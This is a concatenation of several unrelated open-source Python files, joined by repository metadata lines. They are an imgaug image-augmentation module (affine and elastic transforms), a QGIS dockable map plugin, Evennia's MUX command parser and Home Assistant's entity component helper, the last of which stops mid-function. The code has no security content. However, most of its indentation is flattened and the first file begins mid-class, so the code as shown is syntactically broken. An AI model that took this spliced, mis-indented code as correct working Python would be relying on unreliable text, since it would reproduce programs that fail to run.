            assert len(rotate) == 2, "Expected rotate tuple/list with 2 entries, got %d entries." % (len(rotate),)
assert all([ia.is_single_number(val) for val in rotate]), "Expected floats/ints in rotate tuple/list"
self.rotate = Uniform(rotate[0], rotate[1])
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(rotate),))
# shear
# StochasticParameter | float | int | (float or int, float or int) | [float or int, float or int]
if isinstance(shear, StochasticParameter):
self.shear = shear
elif ia.is_single_number(shear):
self.shear = Deterministic(shear)
elif ia.is_iterable(shear):
            assert len(shear) == 2, "Expected shear tuple/list with 2 entries, got %d entries." % (len(shear),)
assert all([ia.is_single_number(val) for val in shear]), "Expected floats/ints in shear tuple/list."
self.shear = Uniform(shear[0], shear[1])
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(shear),))
def _augment_images(self, images, random_state, parents, hooks):
        # skimage's warp() expects float images in the range [0, 1], so we
        # convert to float32 and divide by 255 here, then convert back to
        # uint8 at the end
        if isinstance(images, list):
            result = [image.astype(np.float32, copy=False) / 255.0 for image in images]
else:
result = images.astype(np.float32, copy=False)
result = result / 255.0
nb_images = len(images)
scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples = self._draw_samples(nb_images, random_state)
for i in sm.xrange(nb_images):
height, width = result[i].shape[0], result[i].shape[1]
shift_x = int(width / 2.0)
shift_y = int(height / 2.0)
scale_x, scale_y = scale_samples[0][i], scale_samples[1][i]
translate_x, translate_y = translate_samples[0][i], translate_samples[1][i]
#assert isinstance(translate_x, (float, int))
#assert isinstance(translate_y, (float, int))
if ia.is_single_float(translate_y):
translate_y_px = int(round(translate_y * images[i].shape[0]))
else:
translate_y_px = translate_y
if ia.is_single_float(translate_x):
translate_x_px = int(round(translate_x * images[i].shape[1]))
else:
translate_x_px = translate_x
rotate = rotate_samples[i]
shear = shear_samples[i]
cval = cval_samples[i]
mode = mode_samples[i]
order = order_samples[i]
if scale_x != 1.0 or scale_y != 1.0 or translate_x_px != 0 or translate_y_px != 0 or rotate != 0 or shear != 0:
matrix_to_topleft = tf.SimilarityTransform(translation=[-shift_x, -shift_y])
matrix_transforms = tf.AffineTransform(
scale=(scale_x, scale_y),
translation=(translate_x_px, translate_y_px),
rotation=math.radians(rotate),
shear=math.radians(shear)
)
matrix_to_center = tf.SimilarityTransform(translation=[shift_x, shift_y])
matrix = (matrix_to_topleft + matrix_transforms + matrix_to_center)
result[i] = tf.warp(
result[i],
matrix.inverse,
order=order,
mode=mode,
cval=cval
)
result[i] *= 255.0
np.clip(result[i], 0, 255, out=result[i])
if isinstance(images, list):
result = [image.astype(np.uint8, copy=False) for image in result]
else:
result = result.astype(np.uint8, copy=False)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = []
nb_images = len(keypoints_on_images)
scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples = self._draw_samples(nb_images, random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
height, width = keypoints_on_image.height, keypoints_on_image.width
shift_x = int(width / 2.0)
shift_y = int(height / 2.0)
scale_x, scale_y = scale_samples[0][i], scale_samples[1][i]
translate_x, translate_y = translate_samples[0][i], translate_samples[1][i]
#assert isinstance(translate_x, (float, int))
#assert isinstance(translate_y, (float, int))
if ia.is_single_float(translate_y):
translate_y_px = int(round(translate_y * keypoints_on_image.shape[0]))
else:
translate_y_px = translate_y
if ia.is_single_float(translate_x):
translate_x_px = int(round(translate_x * keypoints_on_image.shape[1]))
else:
translate_x_px = translate_x
rotate = rotate_samples[i]
shear = shear_samples[i]
#cval = cval_samples[i]
#mode = mode_samples[i]
#order = order_samples[i]
if scale_x != 1.0 or scale_y != 1.0 or translate_x_px != 0 or translate_y_px != 0 or rotate != 0 or shear != 0:
matrix_to_topleft = tf.SimilarityTransform(translation=[-shift_x, -shift_y])
matrix_transforms = tf.AffineTransform(
scale=(scale_x, scale_y),
translation=(translate_x_px, translate_y_px),
rotation=math.radians(rotate),
shear=math.radians(shear)
)
matrix_to_center = tf.SimilarityTransform(translation=[shift_x, shift_y])
matrix = (matrix_to_topleft + matrix_transforms + matrix_to_center)
coords = keypoints_on_image.get_coords_array()
#print("coords", coords)
#print("matrix", matrix.params)
coords_aug = tf.matrix_transform(coords, matrix.params)
#print("coords before", coords)
#print("coordsa ftre", coords_aug, np.around(coords_aug).astype(np.int32))
result.append(ia.KeypointsOnImage.from_coords_array(np.around(coords_aug).astype(np.int32), shape=keypoints_on_image.shape))
else:
result.append(keypoints_on_image)
return result
def get_parameters(self):
return [self.scale, self.translate, self.rotate, self.shear]
def _draw_samples(self, nb_samples, random_state):
seed = random_state.randint(0, 10**6, 1)[0]
if isinstance(self.scale, tuple):
scale_samples = (
self.scale[0].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 10)),
self.scale[1].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 20)),
)
else:
scale_samples = self.scale.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 30))
scale_samples = (scale_samples, scale_samples)
if isinstance(self.translate, tuple):
translate_samples = (
self.translate[0].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 40)),
self.translate[1].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 50)),
)
else:
translate_samples = self.translate.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 60))
translate_samples = (translate_samples, translate_samples)
assert translate_samples[0].dtype in [np.int32, np.int64, np.float32, np.float64]
assert translate_samples[1].dtype in [np.int32, np.int64, np.float32, np.float64]
rotate_samples = self.rotate.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 70))
shear_samples = self.shear.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 80))
cval_samples = self.cval.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 90))
mode_samples = self.mode.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 100))
order_samples = self.order.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 110))
return scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples
# code partially from
# https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a
class ElasticTransformation(Augmenter):
"""Augmenter class for ElasticTransformations
    Elastic Transformations are non-rigid transformations of images. Unlike
    Affine Transformations, they do not preserve straight lines and planes;
    instead they distort the image locally.
    Elastic Transformations can be used to create new, unseen images from given
    images, and are used extensively in Machine Learning/Pattern Recognition.
Parameters
----------
    alpha : float, iterable of len 2, StochasticParameter
        Strength of the displacement field; larger values move pixels further.
    sigma : float, iterable of len 2, StochasticParameter
        Smoothness of the displacement field (standard deviation of the
        gaussian filter applied to it); larger values produce smoother warps.
    name : string, optional (default=None)
        name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
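    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = ElasticTransformation(alpha=(0.5, 3.5), sigma=0.25)
        image_aug = aug.augment_image(image)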
"""
def __init__(self, alpha=0, sigma=0, name=None, deterministic=False,
random_state=None):
super(ElasticTransformation, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
assert alpha >= 0.0, "Expected alpha to have range [0, inf), got value %.4f." % (alpha,)
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
            assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(sigma):
assert sigma >= 0.0, "Expected sigma to have range [0, inf), got value %.4f." % (sigma,)
self.sigma = Deterministic(sigma)
elif ia.is_iterable(sigma):
            assert len(sigma) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(sigma),)
self.sigma = Uniform(sigma[0], sigma[1])
elif isinstance(sigma, StochasticParameter):
self.sigma = sigma
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = ia.copy_random_state(random_state).randint(0, 10**6, (nb_images,))
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
sigmas = self.sigma.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i in sm.xrange(nb_images):
image = images[i]
image_first_channel = np.squeeze(image[..., 0])
indices_x, indices_y = ElasticTransformation.generate_indices(image_first_channel.shape, alpha=alphas[i], sigma=sigmas[i], random_state=ia.new_random_state(seeds[i]))
result[i] = ElasticTransformation.map_coordinates(images[i], indices_x, indices_y)
return result
"""
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO do keypoints even have to be augmented for elastic transformations?
# TODO this transforms keypoints to images, augments the images, then transforms
# back to keypoints - inefficient and keypoints that get outside of the images
# cannot be recovered
result = []
nb_images = len(keypoints_on_images)
seeds = ia.copy_random_state(random_state).randint(0, 10**6, (nb_images,))
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
sigmas = self.sigma.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i, keypoints_on_image in enumerate(keypoints_on_images):
indices_x, indices_y = ElasticTransformation.generate_indices(keypoints_on_image.shape[0:2], alpha=alphas[i], sigma=sigmas[i], random_state=ia.new_random_state(seeds[i]))
keypoint_image = keypoints_on_image.to_keypoint_image()
keypoint_image_aug = ElasticTransformation.map_coordinates(keypoint_image, indices_x, indices_y)
keypoints_aug = ia.KeypointsOnImage.from_keypoint_image(keypoint_image_aug)
result.append(keypoints_aug)
return result
"""
# no transformation of keypoints for this currently,
    # it seems like this is the more appropriate choice overall for this augmentation
# technique
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha, self.sigma]
@staticmethod
def generate_indices(shape, alpha, sigma, random_state):
"""Elastic deformation of images as described in [Simard2003]_.
.. [Simard2003] Simard, Steinkraus and Platt, "Best Practices for
Convolutional Neural Networks applied to Visual Document Analysis", in
Proc. of the International Conference on Document Analysis and
Recognition, 2003.
"""
assert len(shape) == 2
dx = ndimage.gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode="constant", cval=0) * alpha
dy = ndimage.gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode="constant", cval=0) * alpha
x, y = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
return np.reshape(x+dx, (-1, 1)), np.reshape(y+dy, (-1, 1))
@staticmethod
def map_coordinates(image, indices_x, indices_y):
assert len(image.shape) == 3
result = np.copy(image)
height, width = image.shape[0:2]
for c in sm.xrange(image.shape[2]):
remapped_flat = ndimage.interpolation.map_coordinates(image[..., c], (indices_x, indices_y), order=1)
remapped = remapped_flat.reshape((height, width))
result[..., c] = remapped
return result
|
CKboss/TheBauble
|
Tensorflow/CNN/ResNet/imgaug/augmenters.py
|
Python
|
gpl-3.0
| 129,266 | 0.003458 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Dockable MirrorMap
Description : Creates a dockable map canvas
Date : February 1, 2011
copyright : (C) 2011 by Giuseppe Sucameli (Faunalia)
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
import resources_rc
class DockableMirrorMapPlugin:
def __init__(self, iface):
# Save a reference to the QGIS iface
self.iface = iface
def initGui(self):
self.dockableMirrors = []
self.lastDockableMirror = 0
self.dockableAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/dockablemirrormap.png"), "Dockable MirrorMap", self.iface.mainWindow())
QObject.connect(self.dockableAction, SIGNAL("triggered()"), self.runDockableMirror)
self.aboutAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/about.png"), "About", self.iface.mainWindow())
QObject.connect(self.aboutAction, SIGNAL("triggered()"), self.about)
# Add to the plugin menu and toolbar
self.iface.addPluginToMenu("Dockable MirrorMap", self.dockableAction)
self.iface.addPluginToMenu("Dockable MirrorMap", self.aboutAction)
self.iface.addToolBarIcon(self.dockableAction)
QObject.connect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.connect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
def unload(self):
QObject.disconnect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.disconnect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
self.removeDockableMirrors()
# Remove the plugin
self.iface.removePluginMenu("Dockable MirrorMap",self.dockableAction)
self.iface.removePluginMenu("Dockable MirrorMap",self.aboutAction)
self.iface.removeToolBarIcon(self.dockableAction)
def about(self):
from DlgAbout import DlgAbout
DlgAbout(self.iface.mainWindow()).exec_()
def removeDockableMirrors(self):
for d in list(self.dockableMirrors):
d.close()
self.dockableMirrors = []
self.lastDockableMirror = 0
def runDockableMirror(self):
from dockableMirrorMap import DockableMirrorMap
wdg = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = wdg.minimumSize()
maxsize = wdg.maximumSize()
self.setupDockWidget(wdg)
self.addDockWidget(wdg)
wdg.setMinimumSize(minsize)
wdg.setMaximumSize(maxsize)
if wdg.isFloating():
wdg.move(50, 50) # nudge the floating widget away from the top-left corner
def setupDockWidget(self, wdg):
othersize = QGridLayout().verticalSpacing()
if len(self.dockableMirrors) <= 0:
width = self.iface.mapCanvas().size().width()/2 - othersize
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumWidth( width )
wdg.setMaximumWidth( width )
elif len(self.dockableMirrors) == 1:
height = self.dockableMirrors[0].size().height()/2 - othersize/2
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
elif len(self.dockableMirrors) == 2:
height = self.iface.mapCanvas().size().height()/2 - othersize/2
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
else:
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setFloating( True )
def addDockWidget(self, wdg, position=None):
if position is None:
position = wdg.getLocation()
else:
wdg.setLocation( position )
mapCanvas = self.iface.mapCanvas()
oldSize = mapCanvas.size()
prevFlag = mapCanvas.renderFlag()
mapCanvas.setRenderFlag(False)
self.iface.addDockWidget(position, wdg)
wdg.setNumber( self.lastDockableMirror )
self.lastDockableMirror = self.lastDockableMirror+1
self.dockableMirrors.append( wdg )
QObject.connect(wdg, SIGNAL( "closed(PyQt_PyObject)" ), self.onCloseDockableMirror)
newSize = mapCanvas.size()
if newSize != oldSize:
# trick: update the canvas size
mapCanvas.resize(newSize.width() - 1, newSize.height())
mapCanvas.setRenderFlag(prevFlag)
mapCanvas.resize(newSize)
else:
mapCanvas.setRenderFlag(prevFlag)
def onCloseDockableMirror(self, wdg):
if wdg in self.dockableMirrors:
self.dockableMirrors.remove( wdg )
if len(self.dockableMirrors) <= 0:
self.lastDockableMirror = 0
def onWriteProject(self, domproject):
if len(self.dockableMirrors) <= 0:
return
QgsProject.instance().writeEntry( "DockableMirrorMap", "/numMirrors", len(self.dockableMirrors) )
for i, dockwidget in enumerate(self.dockableMirrors):
# save position and geometry
floating = dockwidget.isFloating()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/floating" % i, floating )
if floating:
position = "%s %s" % (dockwidget.pos().x(), dockwidget.pos().y())
else:
position = u"%s" % dockwidget.getLocation()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/position" % i, str(position) )
size = "%s %s" % (dockwidget.size().width(), dockwidget.size().height())
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/size" % i, str(size) )
# save the layer list
layerIds = dockwidget.getMirror().getLayerSet()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/layers" % i, layerIds )
scaleFactor = dockwidget.getMirror().scaleFactor.value()
QgsProject.instance().writeEntryDouble("DockableMirrorMap", "/mirror%s/scaleFactor" % i, scaleFactor)
def onProjectLoaded(self):
# restore mirrors?
num, ok = QgsProject.instance().readNumEntry("DockableMirrorMap", "/numMirrors")
if not ok or num <= 0:
return
# remove all mirrors
self.removeDockableMirrors()
mirror2lids = {}
# load mirrors
for i in range(num):
if num >= 2:
if i == 0:
prevFlag = self.iface.mapCanvas().renderFlag()
self.iface.mapCanvas().setRenderFlag(False)
elif i == num-1:
self.iface.mapCanvas().setRenderFlag(True)
from dockableMirrorMap import DockableMirrorMap
dockwidget = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = dockwidget.minimumSize()
maxsize = dockwidget.maximumSize()
# restore position
floating, ok = QgsProject.instance().readBoolEntry("DockableMirrorMap", "/mirror%s/floating" % i)
if ok:
dockwidget.setFloating( floating )
position, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/position" % i)
if ok:
try:
if floating:
parts = position.split(" ")
if len(parts) >= 2:
dockwidget.move( int(parts[0]), int(parts[1]) )
else:
dockwidget.setLocation( int(position) )
except ValueError:
pass
# restore geometry
dockwidget.setFixedSize( dockwidget.geometry().width(), dockwidget.geometry().height() )
size, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/size" % i)
if ok:
try:
parts = size.split(" ")
dockwidget.setFixedSize( int(parts[0]), int(parts[1]) )
except ValueError:
pass
scaleFactor, ok = QgsProject.instance().readDoubleEntry("DockableMirrorMap", "/mirror%s/scaleFactor" % i, 1.0)
if ok: dockwidget.getMirror().scaleFactor.setValue( scaleFactor )
# get layer list
layerIds, ok = QgsProject.instance().readListEntry("DockableMirrorMap", "/mirror%s/layers" % i)
if ok: dockwidget.getMirror().setLayerSet( layerIds )
self.addDockWidget( dockwidget )
dockwidget.setMinimumSize(minsize)
dockwidget.setMaximumSize(maxsize)
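# --- Hedged note (added; not part of the original file) ---
# QGIS discovers a Python plugin through a classFactory(iface) entry point
# in the plugin package's __init__.py; a minimal sketch for this plugin
# (file layout assumed, not taken from the repository) would be:
#
#     def classFactory(iface):
#         from dockableMirrorMapPlugin import DockableMirrorMapPlugin
#         return DockableMirrorMapPlugin(iface)
#
# QGIS then calls initGui() on load and unload() on removal, which is why
# those two hooks above connect and disconnect the plugin's signals.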
|
alfanugraha/LUMENS-repo
|
processing/DockableMirrorMap/dockableMirrorMapPlugin.py
|
Python
|
gpl-2.0
| 8,306 | 0.032145 |
"""
The command template for the default MUX-style command set. There
is also an Player/OOC version that makes sure caller is a Player object.
"""
from evennia.utils import utils
from evennia.commands.command import Command
# limit symbol import for API
__all__ = ("MuxCommand", "MuxPlayerCommand")
class MuxCommand(Command):
"""
This sets up the basis for a MUX command. The idea
is that most other Mux-related commands should just
inherit from this and don't have to implement much
parsing of their own unless they do something particularly
advanced.
Note that the class's __doc__ string (this text) is
used by Evennia to create the automatic help entry for
the command, so make sure to document consistently here.
"""
def has_perm(self, srcobj):
"""
This is called by the cmdhandler to determine
if srcobj is allowed to execute this command.
We just show it here for completeness - we
are satisfied using the default check in Command.
"""
return super(MuxCommand, self).has_perm(srcobj)
def at_pre_cmd(self):
"""
This hook is called before self.parse() on all commands
"""
pass
def at_post_cmd(self):
"""
This hook is called after the command has finished executing
(after self.func()).
"""
pass
def parse(self):
"""
This method is called by the cmdhandler once the command name
has been identified. It creates a new set of member variables
that can be later accessed from self.func() (see below)
The following variables are available for our use when entering this
method (from the command definition, and assigned on the fly by the
cmdhandler):
self.key - the name of this command ('look')
self.aliases - the aliases of this cmd ('l')
self.permissions - permission string for this command
self.help_category - overall category of command
self.caller - the object calling this command
self.cmdstring - the actual command name used to call this
(this allows you to know which alias was used,
for example)
self.args - the raw input; everything following self.cmdstring.
self.cmdset - the cmdset from which this command was picked. Not
often used (useful for commands like 'help' or to
list all available commands etc)
self.obj - the object on which this command was defined. It is often
the same as self.caller.
A MUX command has the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdstring (we don't use
it here). The rest of the command is stored in self.args, which can
start with the switch indicator /.
This parser breaks self.args into its constituents and stores them in the
following variables:
self.switches - [list of /switches (without the /)]
self.raw - the raw argument input, including switches
self.args - re-defined to be everything *except* the switches
self.lhs - everything to the left of '=' (lhs: 'left-hand side'). If
no '=' is found, this is identical to self.args.
self.rhs - everything to the right of '=' (rhs: 'right-hand side').
If no '=' is found, this is None.
self.lhslist - [self.lhs split into a list by comma]
self.rhslist - [self.rhs split into a list by comma]
self.arglist - [list of space-separated args (stripped, including '=' if it exists)]
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
raw = self.args
args = raw.strip()
# split out switches
switches = []
if args and len(args) > 1 and args[0] == "/":
# we have a switch, or a set of switches. These end with a space.
#print "'%s'" % args
switches = args[1:].split(None, 1)
if len(switches) > 1:
switches, args = switches
switches = switches.split('/')
else:
args = ""
switches = switches[0].split('/')
arglist = [arg.strip() for arg in args.split()]
# check for arg1, arg2, ... = argA, argB, ... constructs
lhs, rhs = args, None
lhslist, rhslist = [arg.strip() for arg in args.split(',')], []
if args and '=' in args:
lhs, rhs = [arg.strip() for arg in args.split('=', 1)]
lhslist = [arg.strip() for arg in lhs.split(',')]
rhslist = [arg.strip() for arg in rhs.split(',')]
# save to object properties:
self.raw = raw
self.switches = switches
self.args = args.strip()
self.arglist = arglist
self.lhs = lhs
self.lhslist = lhslist
self.rhs = rhs
self.rhslist = rhslist
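# Worked example (added comment): for the input
#   look/quiet/short here = there, back
# (with 'look' as the command name), this parser leaves:
#   self.switches -> ["quiet", "short"]
#   self.args     -> "here = there, back"
#   self.lhs      -> "here"         self.lhslist -> ["here"]
#   self.rhs      -> "there, back"  self.rhslist -> ["there", "back"]
#   self.arglist  -> ["here", "=", "there,", "back"]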
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
# a simple test command to show the available properties
string = "-" * 50
string += "\n{w%s{n - Command variables from evennia:\n" % self.key
string += "-" * 50
string += "\nname of cmd (self.key): {w%s{n\n" % self.key
string += "cmd aliases (self.aliases): {w%s{n\n" % self.aliases
string += "cmd locks (self.locks): {w%s{n\n" % self.locks
string += "help category (self.help_category): {w%s{n\n" % self.help_category
string += "object calling (self.caller): {w%s{n\n" % self.caller
string += "object storing cmdset (self.obj): {w%s{n\n" % self.obj
string += "command string given (self.cmdstring): {w%s{n\n" % self.cmdstring
# show cmdset.key instead of cmdset to shorten output
string += utils.fill("current cmdset (self.cmdset): {w%s{n\n" % self.cmdset)
string += "\n" + "-" * 50
string += "\nVariables from MuxCommand baseclass\n"
string += "-" * 50
string += "\nraw argument (self.raw): {w%s{n \n" % self.raw
string += "cmd args (self.args): {w%s{n\n" % self.args
string += "cmd switches (self.switches): {w%s{n\n" % self.switches
string += "space-separated arg list (self.arglist): {w%s{n\n" % self.arglist
string += "lhs, left-hand side of '=' (self.lhs): {w%s{n\n" % self.lhs
string += "lhs, comma separated (self.lhslist): {w%s{n\n" % self.lhslist
string += "rhs, right-hand side of '=' (self.rhs): {w%s{n\n" % self.rhs
string += "rhs, comma separated (self.rhslist): {w%s{n\n" % self.rhslist
string += "-" * 50
self.caller.msg(string)
class MuxPlayerCommand(MuxCommand):
"""
This is an on-Player version of the MuxCommand. Since these commands sit
on Players rather than on Characters/Objects, we need to check
this in the parser.
Player commands are also available when puppeting a Character; they are
simply applied with a lower priority, and they remain available even when
disconnected from a character (i.e. "ooc").
This class makes sure that caller is always a Player object, while
creating a new property "character" that is set only if a
character is actually attached to this Player and Session.
"""
def parse(self):
"""
We run the parent parser as usual, then fix the result
"""
super(MuxPlayerCommand, self).parse()
if utils.inherits_from(self.caller, "evennia.objects.objects.DefaultObject"):
# caller is an Object/Character
self.character = self.caller
self.caller = self.caller.player
elif utils.inherits_from(self.caller, "evennia.players.players.DefaultPlayer"):
# caller was already a Player
self.character = self.caller.get_puppet(self.sessid)
else:
self.character = None
|
emergebtc/muddery
|
evennia/evennia/commands/default/muxcommand.py
|
Python
|
bsd-3-clause
| 8,473 | 0.002124 |
"""Helpers for components that manage entities."""
import asyncio
from datetime import timedelta
from itertools import chain
import logging
from homeassistant import config as conf_util
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_SCAN_INTERVAL, CONF_ENTITY_NAMESPACE, MATCH_ALL)
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.service import extract_entity_ids
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
from .entity_platform import EntityPlatform
DEFAULT_SCAN_INTERVAL = timedelta(seconds=15)
DATA_INSTANCES = 'entity_components'
@bind_hass
async def async_update_entity(hass, entity_id):
"""Trigger an update for an entity."""
domain = entity_id.split('.', 1)[0]
entity_comp = hass.data.get(DATA_INSTANCES, {}).get(domain)
if entity_comp is None:
logging.getLogger(__name__).warning(
'Forced update failed. Component for %s not loaded.', entity_id)
return
entity = entity_comp.get_entity(entity_id)
if entity is None:
logging.getLogger(__name__).warning(
'Forced update failed. Entity %s not found.', entity_id)
return
await entity.async_update_ha_state(True)
class EntityComponent:
"""The EntityComponent manages platforms that manages entities.
This class has the following responsibilities:
- Process the configuration and set up a platform based component.
- Manage the platforms and their entities.
- Help extract the entities from a service call.
- Maintain a group that tracks all platform entities.
- Listen for discovery events for platforms related to the domain.
"""
def __init__(self, logger, domain, hass,
scan_interval=DEFAULT_SCAN_INTERVAL, group_name=None):
"""Initialize an entity component."""
self.logger = logger
self.hass = hass
self.domain = domain
self.scan_interval = scan_interval
self.group_name = group_name
self.config = None
self._platforms = {
domain: self._async_init_entity_platform(domain, None)
}
self.async_add_entities = self._platforms[domain].async_add_entities
self.add_entities = self._platforms[domain].add_entities
hass.data.setdefault(DATA_INSTANCES, {})[domain] = self
@property
def entities(self):
"""Return an iterable that returns all entities."""
return chain.from_iterable(platform.entities.values() for platform
in self._platforms.values())
def get_entity(self, entity_id):
"""Get an entity."""
for platform in self._platforms.values():
entity = platform.entities.get(entity_id)
if entity is not None:
return entity
return None
def setup(self, config):
"""Set up a full entity component.
This doesn't block the executor to protect from deadlocks.
"""
self.hass.add_job(self.async_setup(config))
async def async_setup(self, config):
"""Set up a full entity component.
Loads the platforms from the config and will listen for supported
discovered platforms.
This method must be run in the event loop.
"""
self.config = config
# Look in config for Domain, Domain 2, Domain 3 etc and load them
tasks = []
for p_type, p_config in config_per_platform(config, self.domain):
tasks.append(self._async_setup_platform(p_type, p_config))
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
# Generic discovery listener for loading platform dynamically
# Refer to: homeassistant.components.discovery.load_platform()
async def component_platform_discovered(platform, info):
"""Handle the loading of a platform."""
await self._async_setup_platform(platform, {}, info)
discovery.async_listen_platform(
self.hass, self.domain, component_platform_discovered)
async def async_setup_entry(self, config_entry):
"""Set up a config entry."""
platform_type = config_entry.domain
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return False
key = config_entry.entry_id
if key in self._platforms:
raise ValueError('Config entry has already been set up!')
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform,
scan_interval=getattr(platform, 'SCAN_INTERVAL', None),
)
return await self._platforms[key].async_setup_entry(config_entry)
async def async_unload_entry(self, config_entry):
"""Unload a config entry."""
key = config_entry.entry_id
platform = self._platforms.pop(key, None)
if platform is None:
raise ValueError('Config entry was never loaded!')
await platform.async_reset()
return True
@callback
def async_extract_from_service(self, service, expand_group=True):
"""Extract all known and available entities from a service call.
Will return all entities if no entities specified in call.
Will return an empty list if entities specified but unknown.
This method must be run in the event loop.
"""
data_ent_id = service.data.get(ATTR_ENTITY_ID)
if data_ent_id in (None, MATCH_ALL):
if data_ent_id is None:
self.logger.warning(
'Not passing an entity ID to a service to target all '
'entities is deprecated. Update your call to %s.%s to be '
'instead: entity_id: "*"', service.domain, service.service)
return [entity for entity in self.entities if entity.available]
entity_ids = set(extract_entity_ids(self.hass, service, expand_group))
return [entity for entity in self.entities
if entity.available and entity.entity_id in entity_ids]
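# Worked example (added comment): a call with service data
# {"entity_id": ["light.kitchen"]} returns only that entity (if available),
# {"entity_id": "*"} returns every available entity, and a missing
# entity_id currently behaves like "*" but emits the deprecation warning
# above.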
@callback
def async_register_entity_service(self, name, schema, func):
"""Register an entity service."""
async def handle_service(call):
"""Handle the service."""
await self.hass.helpers.service.entity_service_call(
self._platforms.values(), func, call
)
self.hass.services.async_register(
self.domain, name, handle_service, schema)
async def _async_setup_platform(self, platform_type, platform_config,
discovery_info=None):
"""Set up a platform for this component."""
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return
# Use config scan interval, fallback to platform if none set
scan_interval = platform_config.get(
CONF_SCAN_INTERVAL, getattr(platform, 'SCAN_INTERVAL', None))
entity_namespace = platform_config.get(CONF_ENTITY_NAMESPACE)
key = (platform_type, scan_interval, entity_namespace)
if key not in self._platforms:
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform, scan_interval, entity_namespace
)
